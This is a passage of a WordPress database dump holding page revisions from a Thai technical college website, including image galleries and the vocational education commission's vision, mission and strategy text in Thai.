src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<img class=\"alignnone size-medium wp-image-1203\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" />\r\n\r\n<img class=\"alignnone size-medium wp-image-1201\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" />\r\n\r\n<img class=\"alignnone size-medium wp-image-1202\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-19 13:37:52', '2018-06-19 06:37:52', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3099, 3, '2018-06-19 13:39:45', '2018-06-19 06:39:45', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-952 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /><img class=\"wp-image-953 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-19 13:39:45', '2018-06-19 06:39:45', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3100, 3, '2018-06-19 13:40:30', '2018-06-19 06:40:30', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-952 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /><img class=\"wp-image-953 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-19 13:40:30', '2018-06-19 06:40:30', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3101, 3, '2018-06-19 13:42:35', '2018-06-19 06:42:35', '<img class=\"aligncenter wp-image-1092 size-full\" src=\"/wp-content/uploads/2018/02/15-2-2561-16-21-21.jpg\" alt=\"\" width=\"835\" height=\"623\" />\r\n\r\n \r\n<h3><strong>สำนักงานคณะกรรมการการอาชีวศึกษา</strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษาได้ดำเนินการในการผลิตและพัฒนากำลังคน เพื่อสนองตอบความต้องการกำลังคนในการพัฒนาประเทศ โดยในปี 2551 ได้สร้างภาพลักษณ์ที่ดีให้กับการอาชีวศึกษา เพื่อสร้างความนิยมในการเรียนวิชาชีพให้กับสังคม มีเป้าหมายเพื่อเพิ่มปริมาณผู้เรียน ในขณะเดียวกันได้ใช้กิจกรรมการบริการสังคมในโครงการและวาระพิเศษต่างๆเพื่อให้สังคมได้รับรู้ถึงศักยภาพของผู้เรียนอาชีวศึกษา และเป็นการสร้างประสบการณ์ให้กับผู้เรียนทั้งในด้านการฝึกงานวิชาชีพและปลูกฝังสำนึกการบริการสังคม นอกจากนี้ได้เน้นเครือข่ายความร่วมมือกับทุกภาคส่วนให้เข้ามาร่วมรับผิดชอบและมีบทบาทในการจัดการอาชีวศึกษาร่วมกันมากขึ้น ผลการดำเนินการดังกล่าวในปี 2551 ช่วยทำให้การอาชีวศึกษาเป็นที่รู้จักกับสังคมมากขึ้น และกลุ่มเป้าหมายต่างต้องการเข้าสู่ระบบอาชีวศึกษา ดังนั้นในปี2552 นี้ สำนักงานคณะกรรมการการอาชีวศึกษา จึงต้องการที่จะพัฒนาด้านคุณภาพให้เพิ่มขึ้นควบคู่ไปกับปริมาณผู้เรียน และขยายบทบาทการจัดการอาชีวศึกษาสำหรับผู้เรียนที่เป็นผู้มีงานทำแล้ว ผู้ที่ต้องการพัฒนาศักยภาพ และผู้ที่กำลังหางานทำให้มากขึ้น และให้ความสำคัญกับการค้นหา พัฒนา เผยแพร่ นวัตกรรม เทคโนโลยีเพื่อสร้าง และพัฒนาอาชีพให้เกิดประโยชน์ในเชิงพาณิชย์ จึงได้กำหนดแผนปฏิบัติราชการในปีงบประมาณ 2552 ไว้ดังนี้</h4>\r\n<h3></h3>\r\n<h3><strong>วิสัยทัศน์</strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษา เป็นองค์กรหลักที่มุ่งมั่นผลิตและพัฒนากำลังคนอาชีวศึกษาให้มีคุณภาพและมาตรฐาน สอดคล้องกับการพัฒนาเศรษฐกิจและสังคม ส่งผลต่อการเพิ่มขีดความสามารถในการแข่งขันของประเทศ</h4>\r\n<h3></h3>\r\n<h3><strong>พันธกิจ </strong></h3>\r\n<h4>• จัดการอาชีวศึกษาและฝึกอบรมวิชาชีพให้มีคุณภาพมาตรฐาน</h4>\r\n<h4>• ขยายโอกาสทางการศึกษาวิชาชีพ อย่างทั่วถึงและเสมอภาค</h4>\r\n<h4>• วิจัย สร้างนวัตกรรม พัฒนาองค์ความรู้ เพื่อการพัฒนาอาชีพ</h4>\r\n<h4>ในการผลักดันให้วิสัยทัศน์และพันธกิจบรรลุตามเป้าหมายนั้น สำนักงานคณะกรรมการการอาชีวศึกษาได้กำหนดยุทธศาสตร์ไว้ 6 ยุทธศาสตร์ 35 กลยุทธ์ ดังนี้</h4>\r\n \r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 1 : การพัฒนาการจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพให้มีคุณภาพมาตรฐาน</span></strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษามีภารกิจเกี่ยวกับการจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพโดยคำนึงถึงคุณธรรมและความเป็นเลิศทางวิชาชีพ การพัฒนาการจัดการอาชีวศึกษาและฝึกอบรมวิชาชีพ จะเน้นการผลิตกำลังคนให้มีคุณภาพมาตรฐาน มีเส้นทางอาชีพที่ชัดเจน เพื่อสนับสนุนขีดความสามารถในการแข่งขันของประเทศ ตลอดจนให้มีการรับรองสมรรถนะของบุคคลในการประกอบอาชีพ เสริมสร้างทักษะการเป็นผู้ประกอบการ และสร้างค่านิยมที่ดีต่อการอาชีวศึกษา โดยมีเป้าประสงค์ให้ผู้สำเร็จอาชีวศึกษาและการฝึกอบรมวิชาชีพมีคุณภาพ มาตรฐาน มีงานทำและดำรงชีวิตอย่างมีความสุขในสังคม โดยมีกลยุทธ์หลักคือ</h4>\r\n<h4>1. พัฒนาครูและบุคลากรอาชีวศึกษา</h4>\r\n<h4>2. เร่งรัดพัฒนาคุณภาพและสมรรถนะผู้เรียน</h4>\r\n<h4>3. สร้างมาตรฐานและพัฒนาหลักสูตร กระบวนการเรียนการสอน และการวัดและประเมินผล</h4>\r\n<h4>4. ส่งเสริมการประกันคุณภาพสถานศึกษา</h4>\r\n<h4>5. ส่งเสริมคุณธรรม จริยธรรม และจรรยาบรรณวิชาชีพ</h4>\r\n<h4>6. พัฒนาสถานศึกษาและสถาบันการอาชีวศึกษาให้ได้มาตรฐาน มีความเป็นเลิศทางวิชาชีพ</h4>\r\n<h4>7. สร้างเสริมประสบการณ์วิชาชีพ ปลูกจิตอาสา ด้วยการบริการสังคม</h4>\r\n<h4>8. ส่งเสริมให้นำเทคโนโลยีสารสนเทศ สื่อ นวัตกรรม มาใช้ในการเรียนการสอน เสริมสร้างทักษะการเป็นผู้ประกอบการ</h4>\r\n<h4>9. สร้างภาพลักษณ์ที่ดีต่อการอาชีวศึกษา</h4>\r\n \r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 2 : สร้างเครือข่ายและส่งเสริมความร่วมมือ</span></strong></h3>\r\n<h4>การผลิตและพัฒนากำลังคนให้ตรงตามความต้องการของประเทศ ต้องได้รับร่วมมือกับองค์กรที่ต้องการใช้กำลังคน ตั้งแต่ภาคการผลิต เอกชน รัฐวิสาหกิจ และชุมชน เพื่อสร้างเครือข่ายความร่วมมือในการจัดการอาชีวศึกษาทั้งในและต่างประเทศ นำไปสู่การกำหนดหลักสูตร กระบวนการจัดการเรียนการสอนในการผลิตกกำลังคนได้ตรงกับความต้องการภาคการผลิตและความต้องการของผู้ใช้ โดยมีเป้าประสงค์ เพื่อผลิตและพัฒนากำลังคนสอดคล้องกับความต้องการของตลาดแรงงานและท้องถิ่น และมีกลยุทธ์ คือ</h4>\r\n<h4>1. ส่งเสริมและสนับสนุนความร่วมมือในการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพทั้งในและต่างประเทศ</h4>\r\n<h4>2. สร้างความเข้มแข็งในการสร้างเครือข่ายและความร่วมมือในการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพ</h4>\r\n<h4>3. พัฒนาฐานข้อมูลความร่วมมือ</h4>\r\n<h4>4. พัฒนาศูนย์กำลังคนอาชีวศึกษา</h4>\r\n<h4>5. ประสาน ส่งเสริมและสนับสนุน การจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพของสถานศึกษาเอกชน สถานประกอบการและเครือข่าย</h4>\r\n<h3></h3>\r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 3: พัฒนาระบบบริหารจัดการอาชีวศึกษา</span></strong></h3>\r\n<h4>คุณภาพของการอาชีวศึกษา มีระบบการบริหารจัดการอาชีวศึกษาองค์ประกอบที่สำคัญที่สุดที่จะส่งผลต่อคุณภาพ การปฏิรูประบบราชการ พระราชกฤษฎีกาว่าด้วยหลักเกณฑ์และวิธีการบริหารกิจการบ้านเมืองที่ดี พ.ศ. 2546 และนำแนวทางการพัฒนาคุณภาพการบริหารจัดการภาครัฐ (Public Sector Management Quality Award : PMQA) ซี่งเป็นเครื่องมือในการพัฒนาองค์กรไปสู่ความเป็นเลิศ ในขณะที่กฎหมายการอาชีวศึกษาได้ระบุถึงการจัดตั้งสถาบันการอาชีวศึกษา ซึ่งต้องมีการพัฒนาระบบการบริหารและจัดการในรูปแบบสถาบันการอาชีวศึกษาควบคู่ไปด้วย อีกทั้งจากการประกาศใช้กฎหมายการอาชีวศึกษาดังกล่าว มีผลให้ต้องสร้างกฎหมาย กฎระเบียบ ต่างๆเพื่อนำไปสู่การปฏิบัติ</h4>\r\n<h4>ดังนั้นเพื่อให้การพัฒนาระบบบริหารและจัดการอาชีวศึกษาเป็นไปอย่างมีประสิทธิภาพ จึงได้กำหนดกลยุทธ์ไว้ดังนี้</h4>\r\n<h4>1. จัดและพัฒนาโครงสร้างการบริหารงานให้เป็นไปตาม ก.ม.การอาชีวศึกษาและก.ม.อื่นที่เกี่ยวข้อง</h4>\r\n<h4>2. พัฒนาระบบบริหารจัดการตามหลักเกณฑ์คุณภาพการบริหารจัดการภาครัฐและธรรมาภิบาล</h4>\r\n<h4>3. พัฒนากฎหมาย กฎ ระเบียบ ข้อบังคับ</h4>\r\n<h4>4. กระจายอำนาจการบริหารจัดการสู่สถานศึกษาและสถาบัน</h4>\r\n<h4>5. ผลักดันการจัดตั้งสถาบันการอาชีวศึกษา</h4>\r\n<h4>6. พัฒนาระบบติดตามและประเมินผลให้มีประสิทธิภาพ</h4>\r\n<h4>7. พัฒนาระบบการตรวจสอบภายในให้มีประสิทธิภาพ</h4>\r\n<h4>8. ส่งเสริมการนำเทคโนโลยีสารสนเทศเพื่อการบริหารจัดการและการให้บริการ</h4>\r\n<h4>9. เสริมสร้างสวัสดิการและขวัญกำลังใจ</h4>\r\n<h3></h3>\r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 4 : ขยายโอกาสทางการศึกษาวิชาชีพและส่งเสริมการเรียนรู้ตลอดชีวิต</span></strong></h3>\r\n<h4>มุ่งเน้นการเพิ่มโอกาสทางการศึกษาวิชาชีพให้ประชาชนทุกคนมีโอกาสเข้าถึงการศึกษาด้านวิชาชีพที่มีคุณภาพมาตรฐานอย่างต่อเนื่องตลอดชีวิต ทั้งการศึกษาในระบบ</h4>\r\n<h4>การศึกษานอกระบบ และการศึกษาตามอัธยาศัย โดยมีจุดมุ่งหมายให้คลอบคลุมประชาชนทุกเพศทุกวัย และกลุ่มเป้าหมายทั้งเด็ก เยาวชน วัยแรงงาน สตรี ผู้สูงอายุ โดยเฉพาะผู้ยากไร้ ด้อยโอกาสคนพิการ ผู้ห่างไกลทุรกันดารและชนกลุ่มน้อย มีกลยุทธ์ดังนี้</h4>\r\n<h4>1. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพ ด้วยรูปแบบที่หลากหลายทั้งในระบบ นอกระบบ และทวิภาคี</h4>\r\n<h4>2. ส่งเสริมและพัฒนาอาชีพให้ประชาชนในการสร้างงานสร้างรายได้</h4>\r\n<h4>3. จัดการศึกษาวิชาชีพแก่ผู้ด้อยโอกาส คนพิการ ผู้สูงอายุ</h4>\r\n<h4>4. ส่งเสริมให้มีการสร้างรายได้ระหว่างเรียน</h4>\r\n<h4></h4>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 5 : จัดอาชีวศึกษาเพื่อสร้างเสริมความมั่นคงของรัฐ</span></strong></h3>\r\n<h4>ส่งเสริมการจัดการศึกษาในจังหวัดชายแดน ให้เป็นกลไกเสริมสร้างความสมานฉันท์ สันติวิธี วิถีประชาธิปไตย บนพื้นฐานความหลากหลายทางวัฒนธรรม และความเป็นอัตลักษณ์ของแต่ละพื้นที่ มีความร่วมมือระหว่างประเทศด้านการศึกษา แลกเปลี่ยนความรู้ พัฒนาวิชาการ/วิชาชีพ เตรียมความพร้อมรองรับการเปิดเสรีการค้าในอนาคต โดยหวังผลให้ประเทศไทยเป็นศูนย์กลางการศึกษาวิชาชีพในภูมิภาค โดยเฉพาะสาขาที่มีศักยภาพและความพร้อม ประกอบไปด้วยกลยุทธ์ ดังนี้</h4>\r\n<h4>1. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพในเขตชายแดนภาคใต้</h4>\r\n<h4>2. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพในพื้นที่ชายแดน และเขตพัฒนาพิเศษเฉพาะกิจ</h4>\r\n<h4>3. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพตามโครงการพระราชดำริ</h4>\r\n<h4>4. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาร่วมกับประเทศเพื่อนบ้านเพื่อสร้างความเข้าใจอันดี</h4>\r\n<h4></h4>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ ที่ 6 สนับสนุนการวิจัยและพัฒนาถ่ายทอดองค์ความรู้และเทคโนโลยี </span></strong></h3>\r\n<h4>เพื่อให้การอาชีวศึกษาเป็นองค์กรแห่งการเรียนรู้ ตั้งแต่การพัฒนาระบบการบริหารจัดการให้เอื้อต่อการเรียนรู้ การสร้างองค์ความรู้ และนวัตกรรมทางวิชาชีพ การเชื่อมโยงการวิจัยกับกระบวนการจัดการเรียนการสอนวิชาชีพ มีกลไกนำผลการวิจัยไปใช้ประโยชน์ได้จริง มีกลยุทธ์ ดังนี้</h4>\r\n<h4>1. ส่งเสริมพัฒนาการวิจัย สร้างนวัตกรรม สิ่งประดิษฐ์ และการวิจัยเชิงนโยบาย การวิจัยเพื่อตอบสนองความต้องการของสถานประกอบการ</h4>\r\n<h4>2. ส่งเสริมการนำองค์ความรู้ เทคโนโลยี และนวัตกรรม ไปใช้พัฒนาคุณภาพการบริหารจัดการและการเรียนการสอน</h4>\r\n<h4>3. ส่งเสริมให้นำความรู้ เทคโนโลยี สิ่งประดิษฐ์ และนวัตกรรม ไปใช้พัฒนาอาชีพ จดสิทธิบัตร และพัฒนาสู่เชิงพาณิชย์</h4>\r\n<h4>4. พัฒนาระบบบริหารจัดการ เครือข่ายงานวิจัย และการจัดการความรู้อาชีวศึกษา ทั้งในประเทศและระดับนานาชาติ</h4>\r\n<a href=\"http://www.technicrayong.ac.th/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n</div>\r\n</div>\r\n</div>', 'วิสัยทัศน์', '', 'inherit', 'closed', 'closed', '', '1091-revision-v1', '', '', '2018-06-19 13:42:35', '2018-06-19 06:42:35', '', 1091, 'http://www.technicrayong.ac.th/1091-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3102, 3, '2018-06-19 13:43:25', '2018-06-19 06:43:25', '<img class=\"aligncenter wp-image-1092 size-full\" src=\"/wp-content/uploads/2018/02/15-2-2561-16-21-21.jpg\" alt=\"\" width=\"835\" height=\"623\" />\r\n\r\n \r\n<h3><strong>สำนักงานคณะกรรมการการอาชีวศึกษา</strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษาได้ดำเนินการในการผลิตและพัฒนากำลังคน เพื่อสนองตอบความต้องการกำลังคนในการพัฒนาประเทศ โดยในปี 2551 ได้สร้างภาพลักษณ์ที่ดีให้กับการอาชีวศึกษา เพื่อสร้างความนิยมในการเรียนวิชาชีพให้กับสังคม มีเป้าหมายเพื่อเพิ่มปริมาณผู้เรียน ในขณะเดียวกันได้ใช้กิจกรรมการบริการสังคมในโครงการและวาระพิเศษต่างๆเพื่อให้สังคมได้รับรู้ถึงศักยภาพของผู้เรียนอาชีวศึกษา และเป็นการสร้างประสบการณ์ให้กับผู้เรียนทั้งในด้านการฝึกงานวิชาชีพและปลูกฝังสำนึกการบริการสังคม นอกจากนี้ได้เน้นเครือข่ายความร่วมมือกับทุกภาคส่วนให้เข้ามาร่วมรับผิดชอบและมีบทบาทในการจัดการอาชีวศึกษาร่วมกันมากขึ้น ผลการดำเนินการดังกล่าวในปี 2551 ช่วยทำให้การอาชีวศึกษาเป็นที่รู้จักกับสังคมมากขึ้น และกลุ่มเป้าหมายต่างต้องการเข้าสู่ระบบอาชีวศึกษา ดังนั้นในปี2552 นี้ สำนักงานคณะกรรมการการอาชีวศึกษา จึงต้องการที่จะพัฒนาด้านคุณภาพให้เพิ่มขึ้นควบคู่ไปกับปริมาณผู้เรียน และขยายบทบาทการจัดการอาชีวศึกษาสำหรับผู้เรียนที่เป็นผู้มีงานทำแล้ว ผู้ที่ต้องการพัฒนาศักยภาพ และผู้ที่กำลังหางานทำให้มากขึ้น และให้ความสำคัญกับการค้นหา พัฒนา เผยแพร่ นวัตกรรม เทคโนโลยีเพื่อสร้าง และพัฒนาอาชีพให้เกิดประโยชน์ในเชิงพาณิชย์ จึงได้กำหนดแผนปฏิบัติราชการในปีงบประมาณ 2552 ไว้ดังนี้</h4>\r\n<h3></h3>\r\n<h3><strong>วิสัยทัศน์</strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษา เป็นองค์กรหลักที่มุ่งมั่นผลิตและพัฒนากำลังคนอาชีวศึกษาให้มีคุณภาพและมาตรฐาน สอดคล้องกับการพัฒนาเศรษฐกิจและสังคม ส่งผลต่อการเพิ่มขีดความสามารถในการแข่งขันของประเทศ</h4>\r\n<h3></h3>\r\n<h3><strong>พันธกิจ </strong></h3>\r\n<h4>• จัดการอาชีวศึกษาและฝึกอบรมวิชาชีพให้มีคุณภาพมาตรฐาน</h4>\r\n<h4>• ขยายโอกาสทางการศึกษาวิชาชีพ อย่างทั่วถึงและเสมอภาค</h4>\r\n<h4>• วิจัย สร้างนวัตกรรม พัฒนาองค์ความรู้ เพื่อการพัฒนาอาชีพ</h4>\r\n<h4>ในการผลักดันให้วิสัยทัศน์และพันธกิจบรรลุตามเป้าหมายนั้น สำนักงานคณะกรรมการการอาชีวศึกษาได้กำหนดยุทธศาสตร์ไว้ 6 ยุทธศาสตร์ 35 กลยุทธ์ ดังนี้</h4>\r\n \r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 1 : การพัฒนาการจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพให้มีคุณภาพมาตรฐาน</span></strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษามีภารกิจเกี่ยวกับการจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพโดยคำนึงถึงคุณธรรมและความเป็นเลิศทางวิชาชีพ การพัฒนาการจัดการอาชีวศึกษาและฝึกอบรมวิชาชีพ จะเน้นการผลิตกำลังคนให้มีคุณภาพมาตรฐาน มีเส้นทางอาชีพที่ชัดเจน เพื่อสนับสนุนขีดความสามารถในการแข่งขันของประเทศ ตลอดจนให้มีการรับรองสมรรถนะของบุคคลในการประกอบอาชีพ เสริมสร้างทักษะการเป็นผู้ประกอบการ และสร้างค่านิยมที่ดีต่อการอาชีวศึกษา 